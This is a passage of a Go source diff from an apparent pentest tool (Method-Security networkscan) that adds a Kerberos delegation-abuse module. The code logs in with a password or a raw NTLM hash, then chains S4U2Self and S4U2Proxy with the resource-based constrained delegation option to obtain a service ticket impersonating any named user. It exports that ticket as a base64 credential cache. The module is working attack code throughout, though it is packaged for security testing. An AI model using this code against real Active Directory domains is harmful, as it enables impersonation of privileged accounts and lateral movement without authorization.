+		target.Domain = strings.ToUpper(*pentestConfig.Domain)
+	}
+
+	log.Info("Starting Kerberos service ticket request",
+		svc1log.SafeParam("target", pentestConfig.Targets[0]),
+		svc1log.SafeParam("spn", pentestConfig.Spn),
+		svc1log.SafeParam("impersonate", pentestConfig.Impersonate))
+
+	// Parse SPN to extract service components
+	spnParts := strings.Split(pentestConfig.Spn, "/")
+	if len(spnParts) != 2 {
+		return &kerberosfern.PentestKerberosServiceTicketResult{
+			Target:          pentestConfig.Targets[0],
+			Spn:             pentestConfig.Spn,
+			ImpersonateUser: pentestConfig.Impersonate,
+			RequestingUser:  "",
+			TicketAcquired:  false,
+			Message:         "Invalid SPN format. Expected: service/hostname.domain.com",
+			Timestamp:       time.Now(),
+		}, nil
+	}
+
+	// serviceName := spnParts[0]  // Not currently used
+	// serviceHostFQDN := spnParts[1]  // Not currently used
+
+	// Extract service domain from FQDN - not currently used
+	// serviceDomainParts := strings.SplitN(serviceHostFQDN, ".", 2)
+	// var serviceDomain string
+	// if len(serviceDomainParts) > 1 {
+	//	serviceDomain = serviceDomainParts[1]
+	// }
+
+	// Create Kerberos configuration (match kerbtool behavior)
+	cfg := config.New()
+	cfg.LibDefaults.DNSLookupKDC = false // Disable DNS lookup since we're specifying KDC directly
+	cfg.LibDefaults.DefaultRealm = strings.ToUpper(target.Domain)
+	cfg.Realms = []config.Realm{
+		{
+			Realm: strings.ToUpper(target.Domain),
+			KDC:   []string{fmt.Sprintf("%s:%d", target.Host, target.Port)},
+		},
+	}
+	cfg.DomainRealm = map[string]string{
+		fmt.Sprintf(".%s", strings.ToLower(target.Domain)): strings.ToUpper(target.Domain),
+	}
+	cfg.LibDefaults.Forwardable = true
+
+	// Set ticket lifetimes
+	ticketDuration := time.Hour * 10
+	cfg.LibDefaults.RenewLifetime = ticketDuration
+	cfg.LibDefaults.TicketLifetime = ticketDuration
+
+	// Set up encryption preferences (match kerbtool behavior)
+	cfg.LibDefaults.DefaultTGSEnctypeIDs = []int32{etypeID.AES256_CTS_HMAC_SHA1_96, etypeID.AES128_CTS_HMAC_SHA1_96, etypeID.RC4_HMAC}
+	cfg.LibDefaults.DefaultTktEnctypeIDs = []int32{etypeID.AES256_CTS_HMAC_SHA1_96, etypeID.AES128_CTS_HMAC_SHA1_96, etypeID.RC4_HMAC}
+
+	// Unset RenewableOK flag (match kerbtool behavior)
+	types.UnsetFlag(&cfg.LibDefaults.KDCDefaultOptions, flags.RenewableOK)
+
+	// Set up client with appropriate credentials from unified auth config
+	var krb5Client *client.Client
+	var requestingUser string
+
+	// Create client settings
+	settings := []func(*client.Settings){client.DisablePAFXFAST(true)}
+
+	// Use first available credential method from unified auth config
+	if len(pentestConfig.Usernames) > 0 {
+		requestingUser = pentestConfig.Usernames[0]
+		var password string
+		if len(pentestConfig.Passwords) > 0 {
+			password = pentestConfig.Passwords[0]
+		}
+
+		// Check if NTLM hash is provided
+		if pentestConfig.NtlmHash != nil && *pentestConfig.NtlmHash != "" {
+			hashProcessor := ntlm.NewHashProcessor()
+			hashBytes, hashErr := hashProcessor.ParseNTLMHash(*pentestConfig.NtlmHash)
+			if hashErr != nil {
+				return &kerberosfern.PentestKerberosServiceTicketResult{
+					Target:          pentestConfig.Targets[0],
+					Spn:             pentestConfig.Spn,
+					ImpersonateUser: pentestConfig.Impersonate,
+					RequestingUser:  requestingUser,
+					TicketAcquired:  false,
+					Message:         fmt.Sprintf("Invalid NTLM hash: %v", hashErr),
+					Timestamp:       time.Now(),
+				}, nil
+			}
+			krb5Client = client.NewWithHash(requestingUser, strings.ToUpper(target.Domain), hashBytes, cfg, settings...)
+		} else {
+			krb5Client = client.NewWithPassword(requestingUser, strings.ToUpper(target.Domain), password, cfg, settings...)
+		}
+	} else {
+		return &kerberosfern.PentestKerberosServiceTicketResult{
+			Target:          pentestConfig.Targets[0],
+			Spn:             pentestConfig.Spn,
+			ImpersonateUser: pentestConfig.Impersonate,
+			RequestingUser:  "",
+			TicketAcquired:  false,
+			Message:         "No username provided in auth config",
+			Timestamp:       time.Now(),
+		}, nil
+	}
+
+	// Authenticate the delegation user
+	err = krb5Client.Login()
+	if err != nil {
+		return &kerberosfern.PentestKerberosServiceTicketResult{
+			Target:          pentestConfig.Targets[0],
+			Spn:             pentestConfig.Spn,
+			ImpersonateUser: pentestConfig.Impersonate,
+			RequestingUser:  requestingUser,
+			TicketAcquired:  false,
+			Message:         fmt.Sprintf("Failed to authenticate delegation user: %v", err),
+			Timestamp:       time.Now(),
+		}, nil
+	}
+
+	log.Info("Successfully authenticated requesting user", svc1log.SafeParam("user", requestingUser))
+
+	// Perform service ticket request (with optional impersonation via S4U2Self and S4U2Proxy)
+	var impersonateUser string
+	if pentestConfig.Impersonate != nil {
+		impersonateUser = *pentestConfig.Impersonate
+	}
+	ticketBase64, err := performServiceTicketRequest(ctx, krb5Client, cfg, requestingUser, target.Domain, impersonateUser, pentestConfig.Spn)
+	if err != nil {
+		return &kerberosfern.PentestKerberosServiceTicketResult{
+			Target:          pentestConfig.Targets[0],
+			Spn:             pentestConfig.Spn,
+			ImpersonateUser: pentestConfig.Impersonate,
+			RequestingUser:  requestingUser,
+			TicketAcquired:  false,
+			Message:         fmt.Sprintf("Service ticket request failed: %v", err),
+			Timestamp:       time.Now(),
+		}, nil
+	}
+
+	log.Info("Successfully acquired service ticket")
+
+	return &kerberosfern.PentestKerberosServiceTicketResult{
+		Target:          pentestConfig.Targets[0],
+		Spn:             pentestConfig.Spn,
+		ImpersonateUser: pentestConfig.Impersonate,
+		RequestingUser:  requestingUser,
+		TicketAcquired:  true,
+		TicketBase64:    &ticketBase64,
+		Message:         "Service ticket acquired successfully",
+		Timestamp:       time.Now(),
+	}, nil
+}
+
+// performServiceTicketRequest performs service ticket acquisition (with optional S4U2Self and S4U2Proxy for impersonation)
+func performServiceTicketRequest(ctx context.Context, krb5Client *client.Client, cfg *config.Config, requestingUser, userDomain, impersonateUser, spn string) (string, error) {
+	log := svc1log.FromContext(ctx)
+
+	// Step 1: Get TGT for delegation user
+	tgt, sessionKey, err := krb5Client.GetTGT(strings.ToUpper(userDomain))
+	if err != nil {
+		return "", fmt.Errorf("failed to get TGT: %v", err)
+	}
+
+	log.Debug("Successfully obtained TGT for requesting user")
+
+	if impersonateUser != "" {
+		// Step 2: Perform S4U2Self to get service ticket for impersonated user
+		s4u2SelfTicket, err := performS4U2Self(krb5Client, cfg, requestingUser, userDomain, impersonateUser, tgt, sessionKey)
+		if err != nil {
+			return "", fmt.Errorf("S4U2Self failed: %v", err)
+		}
+
+		log.Debug("Successfully performed S4U2Self")
+
+		// Step 3: Perform S4U2Proxy to get service ticket for target SPN
+		err = performS4U2Proxy(krb5Client, cfg, requestingUser, userDomain, impersonateUser, tgt, s4u2SelfTicket, sessionKey, spn)
+		if err != nil {
+			return "", fmt.Errorf("S4U2Proxy failed: %v", err)
+		}
+
+		log.Debug("Successfully performed S4U2Proxy")
+	} else {
+		// Regular service ticket request without impersonation
+		_, _, err := krb5Client.GetServiceTicket(spn)
+		if err != nil {
+			return "", fmt.Errorf("failed to get service ticket: %v", err)
+		}
+
+		log.Debug("Successfully obtained service ticket")
+	}
+
+	// Step 4: Generate base64 encoded ccache
+	var ticketPrincipal string
+	if impersonateUser != "" {
+		ticketPrincipal = impersonateUser
+	} else {
+		ticketPrincipal = requestingUser
+	}
+	ticketBase64, err := generateTicketBase64(krb5Client, ticketPrincipal, strings.ToUpper(userDomain), spn)
+	if err != nil {
+		return "", fmt.Errorf("failed to generate ticket: %v", err)
+	}
+
+	return ticketBase64, nil
+}
+
+// performS4U2Self performs S4U2Self to get a service ticket for the impersonated user
+func performS4U2Self(krb5Client *client.Client, cfg *config.Config, requestingUser, userDomain, impersonateUser string, tgt messages.Ticket, sessionKey types.EncryptionKey) (messages.Ticket, error) {
+	// Create authenticator
+	auth, err := types.NewAuthenticator(strings.ToUpper(userDomain), types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, requestingUser))
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to create authenticator: %v", err)
+	}
+
+	// Create AP-REQ
+	apReq, err := messages.NewAPReq(tgt, sessionKey, auth)
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to create AP-REQ: %v", err)
+	}
+
+	apReqBytes, err := apReq.Marshal()
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to marshal AP-REQ: %v", err)
+	}
+
+	// Create TGS-REQ for S4U2Self
+	tgsReq, err := messages.NewS4UTGSReq(
+		types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser),
+		types.NewPrincipalName(nametype.KRB_NT_UNKNOWN, requestingUser),
+		tgt.Realm,
+		cfg,
+	)
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to create S4U TGS-REQ: %v", err)
+	}
+
+	// Add PA-TGS-REQ
+	tgsReq.PAData = types.PADataSequence{
+		types.PAData{
+			PADataType:  patype.PA_TGS_REQ,
+			PADataValue: apReqBytes,
+		},
+	}
+
+	// Create PA-FOR-USER (match kerbtool approach)
+	s4uByteArray := bytes.NewBuffer([]byte{})
+	if err := binary.Write(s4uByteArray, binary.LittleEndian, nametype.KRB_NT_PRINCIPAL); err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to write name type: %v", err)
+	}
+	if err := binary.Write(s4uByteArray, binary.LittleEndian, []byte(impersonateUser+userDomain+"Kerberos")); err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to write PA-FOR-USER data: %v", err)
+	}
+
+	checksumEtype, _ := crypto.GetChksumEtype(chksumtype.KERB_CHECKSUM_HMAC_MD5)
+	cksumHash, err := checksumEtype.GetChecksumHash(sessionKey.KeyValue, s4uByteArray.Bytes(), keyusage.KERB_NON_KERB_CKSUM_SALT)
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to calculate checksum: %v", err)
+	}
+
+	impersonatedPrinc := types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser)
+	paForUser := types.PAForUser{
+		UserName:  impersonatedPrinc,
+		UserRealm: userDomain,
+		Chksum: types.Checksum{
+			CksumType: checksumEtype.GetHashID(),
+			Checksum:  cksumHash,
+		},
+		AuthPackage: "Kerberos",
+	}
+
+	paForUserBuf, err := asn1.Marshal(paForUser)
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to marshal PA-FOR-USER: %v", err)
+	}
+
+	// Set required flags
+	types.SetFlag(&tgsReq.ReqBody.KDCOptions, flags.Forwardable)
+	types.SetFlag(&tgsReq.ReqBody.KDCOptions, flags.Renewable)
+	types.SetFlag(&tgsReq.ReqBody.KDCOptions, flags.Canonicalize)
+
+	// Add RC4 support (required for S4U)
+	foundRC4 := false
+	for _, etype := range tgsReq.ReqBody.EType {
+		if etype == etypeID.RC4_HMAC {
+			foundRC4 = true
+			break
+		}
+	}
+	if !foundRC4 {
+		tgsReq.ReqBody.EType = append(tgsReq.ReqBody.EType, etypeID.RC4_HMAC)
+	}
+
+	// Add PA-FOR-USER to PA data
+	tgsReq.PAData = append(tgsReq.PAData, types.PAData{
+		PADataType:  patype.PA_FOR_USER,
+		PADataValue: paForUserBuf,
+	})
+
+	// Perform TGS exchange
+	_, tgsRep, err := krb5Client.TGSExchange(tgsReq, strings.ToUpper(userDomain), tgt, sessionKey, 0)
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("TGS exchange failed: %v", err)
+	}
+
+	return tgsRep.Ticket, nil
+}
+
+// performS4U2Proxy performs S4U2Proxy to get a service ticket for the target SPN
+func performS4U2Proxy(krb5Client *client.Client, cfg *config.Config, requestingUser, userDomain, impersonateUser string, tgt, s4u2SelfTicket messages.Ticket, sessionKey types.EncryptionKey, spn string) error {
+	// Create authenticator
+	auth, err := types.NewAuthenticator(strings.ToUpper(userDomain), types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, requestingUser))
+	if err != nil {
+		return fmt.Errorf("failed to create authenticator: %v", err)
+	}
+
+	// Create AP-REQ
+	apReq, err := messages.NewAPReq(tgt, sessionKey, auth)
+	if err != nil {
+		return fmt.Errorf("failed to create AP-REQ: %v", err)
+	}
+
+	apReqBytes, err := apReq.Marshal()
+	if err != nil {
+		return fmt.Errorf("failed to marshal AP-REQ: %v", err)
+	}
+
+	// Create TGS-REQ for S4U2Proxy
+	tgsReq, err := messages.NewS4UTGSReq(
+		types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser),
+		types.NewPrincipalName(nametype.KRB_NT_SRV_INST, spn),
+		tgt.Realm,
+		cfg,
+	)
+	if err != nil {
+		return fmt.Errorf("failed to create S4U TGS-REQ: %v", err)
+	}
+
+	// Add PA-TGS-REQ
+	tgsReq.PAData = types.PADataSequence{
+		types.PAData{
+			PADataType:  patype.PA_TGS_REQ,
+			PADataValue: apReqBytes,
+		},
+	}
+
+	// Add PA-PAC-OPTIONS for resource-based constrained delegation
+	paPacOptBytes, err := types.GetPAPacOptionsAsnMarshalled([]int{3}) // resource-based-constrained-delegation
+	if err != nil {
+		return fmt.Errorf("failed to create PA-PAC-OPTIONS: %v", err)
+	}
+
+	tgsReq.PAData = append(tgsReq.PAData, types.PAData{
+		PADataType:  patype.PA_PAC_OPTIONS,
+		PADataValue: paPacOptBytes,
+	})
+
+	// Set additional ticket (S4U2Self result)
+	tgsReq.ReqBody.AdditionalTickets = append(tgsReq.ReqBody.AdditionalTickets, s4u2SelfTicket)
+
+	// Set required flags
+	opts := types.NewKrbFlags()
+	types.SetFlags(&opts, []int{flags.Canonicalize, flags.Forwardable, flags.Renewable, flags.CnameInAddlTkt})
+	tgsReq.KDCReqFields.ReqBody.KDCOptions = opts
+
+	// Perform TGS exchange
+	_, _, err = krb5Client.TGSExchange(tgsReq, tgt.Realm, tgt, sessionKey, 0)
+	if err != nil {
+		return fmt.Errorf("TGS exchange failed: %v", err)
+	}
+
+	return nil
+}
+
+// generateTicketBase64 generates the acquired ticket as a base64-encoded ccache
+func generateTicketBase64(krb5Client *client.Client, impersonateUser, userDomain, spn string) (string, error) {
+	// Create ccache
+	cache := credentials.NewV4CCache()
+	clientPrincipal := types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser)
+	principal := credentials.NewPrincipal(clientPrincipal, userDomain)
+	cache.SetDefaultPrincipal(principal)
+	cache.SetKDCTimeOffset(0xFFFFFFFF, 0)
+
+	// Save the service ticket
+	err := krb5Client.SaveSPNToCCache(cache, clientPrincipal, userDomain, spn, "")
+	if err != nil {
+		return "", fmt.Errorf("failed to save SPN to ccache: %v", err)
+	}
+
+	// Marshal ccache to bytes
+	cacheBytes, err := cache.Marshal()
+	if err != nil {
+		return "", fmt.Errorf("failed to marshal ccache: %v", err)
+	}
+
+	// Encode as base64
+	ticketBase64 := base64.StdEncoding.EncodeToString(cacheBytes)
+
+	return ticketBase64, nil
+}

--- a/internal/protocol/kerberos/client.go
+++ b/internal/protocol/kerberos/client.go
@@ -1,0 +1,137 @@
+package kerberos
+
+import (
+	"fmt"
+	"strings"
+	"time"
+
+	kerberosfern "github.com/Method-Security/networkscan/generated/go/pentest/kerberos"
+	"github.com/Method-Security/networkscan/internal/common/ntlm"
+	"github.com/jfjallid/gokrb5/v8/client"
+	"github.com/jfjallid/gokrb5/v8/config"
+	"github.com/jfjallid/gokrb5/v8/iana/etypeID"
+	"github.com/jfjallid/gokrb5/v8/iana/flags"
+	"github.com/jfjallid/gokrb5/v8/types"
+)
+
+// Target represents a parsed Kerberos target
+type Target struct {
+	Host   string
+	Port   int
+	Domain string
+}
+
+// ClientManager handles Kerberos client configuration and creation
+type ClientManager struct {
+	Config *config.Config
+	Target *Target
+}
+
+// NewClientManager creates a new Kerberos client manager
+func NewClientManager(target *Target) *ClientManager {
+	return &ClientManager{
+		Target: target,
+	}
+}
+
+// CreateConfiguration creates a Kerberos configuration for the target
+func (kcm *ClientManager) CreateConfiguration() *config.Config {
+	// Create Kerberos configuration (match kerbtool behavior)
+	cfg := config.New()
+	cfg.LibDefaults.DNSLookupKDC = false // Disable DNS lookup since we're specifying KDC directly
+	cfg.LibDefaults.DefaultRealm = strings.ToUpper(kcm.Target.Domain)
+	cfg.Realms = []config.Realm{
+		{
+			Realm: strings.ToUpper(kcm.Target.Domain),
+			KDC:   []string{fmt.Sprintf("%s:%d", kcm.Target.Host, kcm.Target.Port)},
+		},
+	}
+	cfg.DomainRealm = map[string]string{
+		fmt.Sprintf(".%s", strings.ToLower(kcm.Target.Domain)): strings.ToUpper(kcm.Target.Domain),
+	}
+	cfg.LibDefaults.Forwardable = true
+
+	// Set ticket lifetimes
+	ticketDuration := time.Hour * 10
+	cfg.LibDefaults.RenewLifetime = ticketDuration
+	cfg.LibDefaults.TicketLifetime = ticketDuration
+
+	// Set up encryption preferences (match kerbtool behavior)
+	cfg.LibDefaults.DefaultTGSEnctypeIDs = []int32{etypeID.AES256_CTS_HMAC_SHA1_96, etypeID.AES128_CTS_HMAC_SHA1_96, etypeID.RC4_HMAC}
+	cfg.LibDefaults.DefaultTktEnctypeIDs = []int32{etypeID.AES256_CTS_HMAC_SHA1_96, etypeID.AES128_CTS_HMAC_SHA1_96, etypeID.RC4_HMAC}
+
+	// Unset RenewableOK flag (match kerbtool behavior)
+	types.UnsetFlag(&cfg.LibDefaults.KDCDefaultOptions, flags.RenewableOK)
+
+	kcm.Config = cfg
+	return cfg
+}
+
+// CreateClientFromConfig creates a Kerberos client from the provided config
+func (kcm *ClientManager) CreateClientFromConfig(pentestConfig *kerberosfern.PentestKerberosServiceTicketConfig) (*client.Client, string, error) {
+	if kcm.Config == nil {
+		kcm.CreateConfiguration()
+	}
+
+	// Create client settings
+	settings := []func(*client.Settings){client.DisablePAFXFAST(true)}
+
+	// Use first available credential method from unified auth config
+	if len(pentestConfig.Usernames) == 0 {
+		return nil, "", fmt.Errorf("no username provided in auth config")
+	}
+
+	requestingUser := pentestConfig.Usernames[0]
+	var password string
+	if len(pentestConfig.Passwords) > 0 {
+		password = pentestConfig.Passwords[0]
+	}
+
+	var krb5Client *client.Client
+
+	// Check if NTLM hash is provided
+	if pentestConfig.NtlmHash != nil && *pentestConfig.NtlmHash != "" {
+		hashProcessor := ntlm.NewHashProcessor()
+		hashBytes, hashErr := hashProcessor.ParseNTLMHash(*pentestConfig.NtlmHash)
+		if hashErr != nil {
+			return nil, "", fmt.Errorf("invalid NTLM hash: %v", hashErr)
+		}
+		krb5Client = client.NewWithHash(requestingUser, strings.ToUpper(kcm.Target.Domain), hashBytes, kcm.Config, settings...)
+	} else {
+		krb5Client = client.NewWithPassword(requestingUser, strings.ToUpper(kcm.Target.Domain), password, kcm.Config, settings...)
+	}
+
+	return krb5Client, requestingUser, nil
+}
+
+// ParseTarget parses a target string into components
+func ParseTarget(targetStr string) (*Target, error) {
+	// Split target into host and port
+	parts := strings.Split(targetStr, ":")
+	if len(parts) < 2 {
+		return nil, fmt.Errorf("target must include port (e.g., dc.domain.com:88)")
+	}
+
+	host := parts[0]
+	port := 88 // Default Kerberos port
+	if len(parts) > 1 {
+		if p, err := fmt.Sscanf(parts[1], "%d", &port); err != nil || p != 1 {
+			port = 88 // Fall back to default
+		}
+	}
+
+	// Extract domain from hostname
+	domain := ""
+	hostParts := strings.Split(host, ".")
+	if len(hostParts) > 2 {
+		domain = strings.Join(hostParts[1:], ".")
+	} else {
+		return nil, fmt.Errorf("cannot extract domain from hostname: %s", host)
+	}
+
+	return &Target{
+		Host:   host,
+		Port:   port,
+		Domain: domain,
+	}, nil
+}

--- a/internal/protocol/kerberos/s4u.go
+++ b/internal/protocol/kerberos/s4u.go
@@ -1,0 +1,225 @@
+package kerberos
+
+import (
+	"bytes"
+	"context"
+	"encoding/binary"
+	"fmt"
+	"strings"
+
+	"github.com/jfjallid/gofork/encoding/asn1"
+	"github.com/jfjallid/gokrb5/v8/client"
+	"github.com/jfjallid/gokrb5/v8/config"
+	"github.com/jfjallid/gokrb5/v8/crypto"
+	"github.com/jfjallid/gokrb5/v8/iana/chksumtype"
+	"github.com/jfjallid/gokrb5/v8/iana/etypeID"
+	"github.com/jfjallid/gokrb5/v8/iana/flags"
+	"github.com/jfjallid/gokrb5/v8/iana/keyusage"
+	"github.com/jfjallid/gokrb5/v8/iana/nametype"
+	"github.com/jfjallid/gokrb5/v8/iana/patype"
+	"github.com/jfjallid/gokrb5/v8/messages"
+	"github.com/jfjallid/gokrb5/v8/types"
+	"github.com/palantir/witchcraft-go-logging/wlog/svclog/svc1log"
+)
+
+// S4UManager handles Service for User (S4U) operations for Kerberos delegation
+type S4UManager struct {
+	Client *client.Client
+	Config *config.Config
+}
+
+// NewS4UManager creates a new S4U manager
+func NewS4UManager(client *client.Client, config *config.Config) *S4UManager {
+	return &S4UManager{
+		Client: client,
+		Config: config,
+	}
+}
+
+// PerformS4U2Self performs S4U2Self to get a service ticket for the impersonated user
+func (s4u *S4UManager) PerformS4U2Self(ctx context.Context, requestingUser, userDomain, impersonateUser string, tgt messages.Ticket, sessionKey types.EncryptionKey) (messages.Ticket, error) {
+	log := svc1log.FromContext(ctx)
+
+	// Create authenticator
+	auth, err := types.NewAuthenticator(strings.ToUpper(userDomain), types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, requestingUser))
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to create authenticator: %v", err)
+	}
+
+	// Create AP-REQ
+	apReq, err := messages.NewAPReq(tgt, sessionKey, auth)
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to create AP-REQ: %v", err)
+	}
+
+	apReqBytes, err := apReq.Marshal()
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to marshal AP-REQ: %v", err)
+	}
+
+	// Create TGS-REQ for S4U2Self
+	tgsReq, err := messages.NewS4UTGSReq(
+		types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser),
+		types.NewPrincipalName(nametype.KRB_NT_UNKNOWN, requestingUser),
+		tgt.Realm,
+		s4u.Config,
+	)
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to create S4U TGS-REQ: %v", err)
+	}
+
+	// Add PA-TGS-REQ
+	tgsReq.PAData = types.PADataSequence{
+		types.PAData{
+			PADataType:  patype.PA_TGS_REQ,
+			PADataValue: apReqBytes,
+		},
+	}
+
+	// Create PA-FOR-USER (match kerbtool approach)
+	paForUserData, err := s4u.createPAForUserData(impersonateUser, userDomain, sessionKey)
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("failed to create PA-FOR-USER data: %v", err)
+	}
+
+	// Set required flags
+	types.SetFlag(&tgsReq.ReqBody.KDCOptions, flags.Forwardable)
+	types.SetFlag(&tgsReq.ReqBody.KDCOptions, flags.Renewable)
+	types.SetFlag(&tgsReq.ReqBody.KDCOptions, flags.Canonicalize)
+
+	// Add RC4 support (required for S4U)
+	s4u.ensureRC4Support(&tgsReq.ReqBody.EType)
+
+	// Add PA-FOR-USER to PA data
+	tgsReq.PAData = append(tgsReq.PAData, types.PAData{
+		PADataType:  patype.PA_FOR_USER,
+		PADataValue: paForUserData,
+	})
+
+	// Perform TGS exchange
+	_, tgsRep, err := s4u.Client.TGSExchange(tgsReq, strings.ToUpper(userDomain), tgt, sessionKey, 0)
+	if err != nil {
+		return messages.Ticket{}, fmt.Errorf("TGS exchange failed: %v", err)
+	}
+
+	log.Debug("Successfully performed S4U2Self")
+	return tgsRep.Ticket, nil
+}
+
+// PerformS4U2Proxy performs S4U2Proxy to get a service ticket for the target SPN
+func (s4u *S4UManager) PerformS4U2Proxy(ctx context.Context, requestingUser, userDomain, impersonateUser string, tgt, s4u2SelfTicket messages.Ticket, sessionKey types.EncryptionKey, spn string) error {
+	log := svc1log.FromContext(ctx)
+
+	// Create authenticator
+	auth, err := types.NewAuthenticator(strings.ToUpper(userDomain), types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, requestingUser))
+	if err != nil {
+		return fmt.Errorf("failed to create authenticator: %v", err)
+	}
+
+	// Create AP-REQ
+	apReq, err := messages.NewAPReq(tgt, sessionKey, auth)
+	if err != nil {
+		return fmt.Errorf("failed to create AP-REQ: %v", err)
+	}
+
+	apReqBytes, err := apReq.Marshal()
+	if err != nil {
+		return fmt.Errorf("failed to marshal AP-REQ: %v", err)
+	}
+
+	// Create TGS-REQ for S4U2Proxy
+	tgsReq, err := messages.NewS4UTGSReq(
+		types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser),
+		types.NewPrincipalName(nametype.KRB_NT_SRV_INST, spn),
+		tgt.Realm,
+		s4u.Config,
+	)
+	if err != nil {
+		return fmt.Errorf("failed to create S4U TGS-REQ: %v", err)
+	}
+
+	// Add PA-TGS-REQ
+	tgsReq.PAData = types.PADataSequence{
+		types.PAData{
+			PADataType:  patype.PA_TGS_REQ,
+			PADataValue: apReqBytes,
+		},
+	}
+
+	// Add PA-PAC-OPTIONS for resource-based constrained delegation
+	paPacOptBytes, err := types.GetPAPacOptionsAsnMarshalled([]int{3}) // resource-based-constrained-delegation
+	if err != nil {
+		return fmt.Errorf("failed to create PA-PAC-OPTIONS: %v", err)
+	}
+
+	tgsReq.PAData = append(tgsReq.PAData, types.PAData{
+		PADataType:  patype.PA_PAC_OPTIONS,
+		PADataValue: paPacOptBytes,
+	})
+
+	// Set additional ticket (S4U2Self result)
+	tgsReq.ReqBody.AdditionalTickets = append(tgsReq.ReqBody.AdditionalTickets, s4u2SelfTicket)
+
+	// Set required flags
+	opts := types.NewKrbFlags()
+	types.SetFlags(&opts, []int{flags.Canonicalize, flags.Forwardable, flags.Renewable, flags.CnameInAddlTkt})
+	tgsReq.KDCReqFields.ReqBody.KDCOptions = opts
+
+	// Perform TGS exchange
+	_, _, err = s4u.Client.TGSExchange(tgsReq, tgt.Realm, tgt, sessionKey, 0)
+	if err != nil {
+		return fmt.Errorf("TGS exchange failed: %v", err)
+	}
+
+	log.Debug("Successfully performed S4U2Proxy")
+	return nil
+}
+
+// createPAForUserData creates PA-FOR-USER data for S4U2Self requests
+func (s4u *S4UManager) createPAForUserData(impersonateUser, userDomain string, sessionKey types.EncryptionKey) ([]byte, error) {
+	s4uByteArray := bytes.NewBuffer([]byte{})
+	if err := binary.Write(s4uByteArray, binary.LittleEndian, nametype.KRB_NT_PRINCIPAL); err != nil {
+		return nil, fmt.Errorf("failed to write name type: %v", err)
+	}
+	if err := binary.Write(s4uByteArray, binary.LittleEndian, []byte(impersonateUser+userDomain+"Kerberos")); err != nil {
+		return nil, fmt.Errorf("failed to write PA-FOR-USER data: %v", err)
+	}
+
+	checksumEtype, _ := crypto.GetChksumEtype(chksumtype.KERB_CHECKSUM_HMAC_MD5)
+	cksumHash, err := checksumEtype.GetChecksumHash(sessionKey.KeyValue, s4uByteArray.Bytes(), keyusage.KERB_NON_KERB_CKSUM_SALT)
+	if err != nil {
+		return nil, fmt.Errorf("failed to calculate checksum: %v", err)
+	}
+
+	impersonatedPrinc := types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser)
+	paForUser := types.PAForUser{
+		UserName:  impersonatedPrinc,
+		UserRealm: userDomain,
+		Chksum: types.Checksum{
+			CksumType: checksumEtype.GetHashID(),
+			Checksum:  cksumHash,
+		},
+		AuthPackage: "Kerberos",
+	}
+
+	paForUserBuf, err := asn1.Marshal(paForUser)
+	if err != nil {
+		return nil, fmt.Errorf("failed to marshal PA-FOR-USER: %v", err)
+	}
+
+	return paForUserBuf, nil
+}
+
+// ensureRC4Support ensures RC4 encryption is included in the EType list (required for S4U)
+func (s4u *S4UManager) ensureRC4Support(etypes *[]int32) {
+	foundRC4 := false
+	for _, etype := range *etypes {
+		if etype == etypeID.RC4_HMAC {
+			foundRC4 = true
+			break
+		}
+	}
+	if !foundRC4 {
+		*etypes = append(*etypes, etypeID.RC4_HMAC)
+	}
+}

--- a/internal/protocol/kerberos/ticket.go
+++ b/internal/protocol/kerberos/ticket.go
@@ -1,0 +1,118 @@
+package kerberos
+
+import (
+	"context"
+	"encoding/base64"
+	"fmt"
+	"strings"
+
+	"github.com/jfjallid/gokrb5/v8/client"
+	"github.com/jfjallid/gokrb5/v8/config"
+	"github.com/jfjallid/gokrb5/v8/credentials"
+	"github.com/jfjallid/gokrb5/v8/iana/nametype"
+	"github.com/jfjallid/gokrb5/v8/messages"
+	"github.com/jfjallid/gokrb5/v8/types"
+	"github.com/palantir/witchcraft-go-logging/wlog/svclog/svc1log"
+)
+
+// TicketManager handles Kerberos ticket operations
+type TicketManager struct {
+	Client *client.Client
+	Config *config.Config
+}
+
+// NewTicketManager creates a new ticket manager
+func NewTicketManager(client *client.Client, config *config.Config) *TicketManager {
+	return &TicketManager{
+		Client: client,
+		Config: config,
+	}
+}
+
+// RequestServiceTicket performs service ticket acquisition (with optional S4U2Self and S4U2Proxy for impersonation)
+func (tm *TicketManager) RequestServiceTicket(ctx context.Context, requestingUser, userDomain, impersonateUser, spn string) (string, error) {
+	log := svc1log.FromContext(ctx)
+
+	// Step 1: Get TGT for delegation user
+	tgt, sessionKey, err := tm.Client.GetTGT(strings.ToUpper(userDomain))
+	if err != nil {
+		return "", fmt.Errorf("failed to get TGT: %v", err)
+	}
+
+	log.Debug("Successfully obtained TGT for requesting user")
+
+	if impersonateUser != "" {
+		// Step 2: Perform S4U2Self to get service ticket for impersonated user
+		s4uManager := NewS4UManager(tm.Client, tm.Config)
+
+		s4u2SelfTicket, err := s4uManager.PerformS4U2Self(ctx, requestingUser, userDomain, impersonateUser, tgt, sessionKey)
+		if err != nil {
+			return "", fmt.Errorf("S4U2Self failed: %v", err)
+		}
+
+		log.Debug("Successfully performed S4U2Self")
+
